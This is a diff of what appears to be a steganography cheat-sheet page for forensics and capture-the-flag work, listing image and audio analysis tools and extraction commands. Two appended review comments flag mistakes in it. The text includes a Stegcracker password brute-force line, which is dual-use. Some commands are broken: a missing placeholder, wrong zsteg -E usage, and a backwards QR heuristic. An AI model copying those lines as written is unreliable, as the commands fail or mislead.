- -### FFT - -To find hidden content using Fast Fourier T: - -* [http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/) -* [https://www.ejectamenta.com/Fourifier-fullscreen/](https://www.ejectamenta.com/Fourifier-fullscreen/) -* [https://github.com/0xcomposure/FFTStegPic](https://github.com/0xcomposure/FFTStegPic) -* `pip3 install opencv-python` - -### Stegpy \[PNG, BMP, GIF, WebP, WAV] - -A program for encoding information in image and audio files through steganography. It can store the data as either plaintext or encrypted.\ -Find it on [Github](https://github.com/dhsdshdhk/stegpy). - -### Pngcheck - -Get details on a PNG file (or even find out it's actually something else!).\ -`apt-get install pngcheck`: Install the tool\ -`pngcheck stego.png` : Obtain info about the PNG - -### Some other image tools worth mentioning - -* [http://magiceye.ecksdee.co.uk/](http://magiceye.ecksdee.co.uk/) -* [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/) -* [https://github.com/resurrecting-open-source-projects/outguess](https://github.com/resurrecting-open-source-projects/outguess) -* [https://www.openstego.com/](https://www.openstego.com/) -* [https://diit.sourceforge.net/](https://diit.sourceforge.net/) - -## Extracting data from audios - -### [Steghide \[JPEG, BMP, WAV, AU\]](stego-tricks.md#steghide) - -### [Stegpy \[PNG, BMP, GIF, WebP, WAV\]](stego-tricks.md#stegpy-png-bmp-gif-webp-wav) - -### ffmpeg - -ffmpeg can be used to check the integrity of audio files, reporting various information about the file, as well as any errors it finds.\ -`ffmpeg -v info -i stego.mp3 -f null -` - -### Wavsteg \[WAV] - -WavSteg is a Python3 tool that can hide data, using least significant bit, in wav files. 
It can also search for, and extract, data from wav files.\ -You can get it from [Github](https://github.com/ragibson/Steganography#WavSteg)\ -Useful commands:\ -`python3 WavSteg.py -r -b 1 -s soundfile -o outputfile` : Extracts to an output file (taking only 1 lsb)\ -`python3 WavSteg.py -r -b 2 -s soundfile -o outputfile` : Extracts to an output file (taking only 2 lsb) - -### Deepsound - -Hide, and check for, information encrypted with AES-265 in sound files. Download from [the oficial page](http://jpinsoft.net/deepsound/download.aspx).\ -To search for hidden info, simply run the program and open the sound file. If DeepSound finds any data hidden, you'll need to provide the password to unlock it. - -### Sonic visualizer - -Sonic visualizer is a tool for viewing and analyzing the contents of audio files. It can be very helpful when facing audio steganography challenges; you can reveal hidden shapes in audio files that many other tools won't detect.\ -If you're stuck, always check the spectrogram of the audio. [Offical Website](https://www.sonicvisualiser.org/) - -### DTMF Tones - Dial tones - -* [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/) -* [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html) - -## Other tricks - -### Binary length SQRT - QR Code - -If you receive binary data with an SQRT length of an entire number, it could be some kind of QR code: +**Bruteforce Attack with Stegcracker:** +- To attempt password cracking on Steghide, use [stegcracker](https://github.com/Paradoxis/StegCracker.git) as follows: +```bash +stegcracker [] ``` + +### **zsteg for PNG and BMP Files** + +zsteg specializes in uncovering hidden data in PNG and BMP files. Installation is done via `gem install zsteg`, with its [source on GitHub](https://github.com/zed-0xff/zsteg). + +**Commands:** +- `zsteg -a file` applies all detection methods on a file. +- `zsteg -E file` specifies a payload for data extraction. 
+ +### **StegoVeritas and Stegsolve** + +**stegoVeritas** checks metadata, performs image transformations, and applies LSB brute forcing among other features. Use `stegoveritas.py -h` for a full list of options and `stegoveritas.py stego.jpg` to execute all checks. + +**Stegsolve** applies various color filters to reveal hidden texts or messages within images. It's available on [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve). + +### **FFT for Hidden Content Detection** + +Fast Fourier Transform (FFT) techniques can unveil concealed content in images. Useful resources include: + +- [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/) +- [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/) +- [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic) + +### **Stegpy for Audio and Image Files** + +Stegpy allows embedding information into image and audio files, supporting formats like PNG, BMP, GIF, WebP, and WAV. It's available on [GitHub](https://github.com/dhsdshdhk/stegpy). + +### **Pngcheck for PNG File Analysis** + +To analyze PNG files or to validate their authenticity, use: + +```bash +apt-get install pngcheck +pngcheck stego.png +``` + +### **Additional Tools for Image Analysis** + +For further exploration, consider visiting: + +- [Magic Eye Solver](http://magiceye.ecksdee.co.uk/) +- [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/) +- [Outguess](https://github.com/resurrecting-open-source-projects/outguess) +- [OpenStego](https://www.openstego.com/) +- [DIIT](https://diit.sourceforge.net/) + +## **Extracting Data from Audios** + +**Audio steganography** offers a unique method to conceal information within sound files. Different tools are utilized for embedding or retrieving hidden content. + +### **Steghide (JPEG, BMP, WAV, AU)** +Steghide is a versatile tool designed for hiding data in JPEG, BMP, WAV, and AU files. 
Detailed instructions are provided in the [stego tricks documentation](stego-tricks.md#steghide). + +### **Stegpy (PNG, BMP, GIF, WebP, WAV)** +This tool is compatible with a variety of formats including PNG, BMP, GIF, WebP, and WAV. For more information, refer to [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav). + +### **ffmpeg** +ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies. +```bash +ffmpeg -v info -i stego.mp3 -f null - +``` + +### **WavSteg (WAV)** +WavSteg excels in concealing and extracting data within WAV files using the least significant bit strategy. It is accessible on [GitHub](https://github.com/ragibson/Steganography#WavSteg). Commands include: +```bash +python3 WavSteg.py -r -b 1 -s soundfile -o outputfile + +python3 WavSteg.py -r -b 2 -s soundfile -o outputfile +``` + +### **Deepsound** +Deepsound allows for the encryption and detection of information within sound files using AES-256. It can be downloaded from [the official page](http://jpinsoft.net/deepsound/download.aspx). + +### **Sonic Visualizer** +An invaluable tool for visual and analytical inspection of audio files, Sonic Visualizer can unveil hidden elements undetectable by other means. Visit the [official website](https://www.sonicvisualiser.org/) for more. + +### **DTMF Tones - Dial Tones** +Detecting DTMF tones in audio files can be achieved through online tools such as [this DTMF detector](https://unframework.github.io/dtmf-detect/) and [DialABC](http://dialabc.com/sound/detect/index.html). + +## **Other Techniques** + +### **Binary Length SQRT - QR Code** +Binary data that squares to a whole number might represent a QR code. Use this snippet to check: +```python import math math.sqrt(2500) #50 ``` +For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/). 
+ +### **Braille Translation** +For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource. + -To convert binary "1"s and "0"s to a proper image: [https://www.dcode.fr/binary-image](https://github.com/carlospolop/hacktricks/tree/32fa51552498a17d266ff03e62dfd1e2a61dcd10/binary-image/README.md)\ -To read a QR code: [https://online-barcode-reader.inliteresearch.com/](https://online-barcode-reader.inliteresearch.com/) -### Braile -[https://www.branah.com/braille-translator](https://www.branah.com/braille-translator\)) ## **References**
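Review bot: the Stegcracker usage line `stegcracker []` has lost its argument placeholders, most likely because the angle-bracket tokens were stripped as HTML; the tool's documented form is `stegcracker <file> [<wordlist>]`, so write it that way (or escape the brackets) so readers know the first argument is the stego file and the optional second one is a wordlist. In the same region, the bullet `zsteg -E file` is described as "specifies a payload for data extraction", but `-E` takes the payload name as its own argument (e.g. `zsteg -E "b1,bgr,lsb,xy" file`), so as written `file` would be parsed as the payload spec; show the two-argument form and say the name comes from a preceding `zsteg -a file` run.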
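Review bot: in the "Binary Length SQRT - QR Code" section the sentence "Binary data that squares to a whole number" states the condition backwards, and the snippet does not implement the check it introduces: the heuristic is that the number of bits has an integer square root (a 2500-bit blob could be a 50x50 bitmap), while `math.sqrt(2500) #50` only evaluates a constant. Replace it with a check on the actual data, e.g. `n = len(bits)`, `side = math.isqrt(n)`, then test `side * side == n` and report `side` as the candidate edge length (`math.isqrt` needs Python 3.8+; `int(math.sqrt(n)) ** 2 == n` works on older versions).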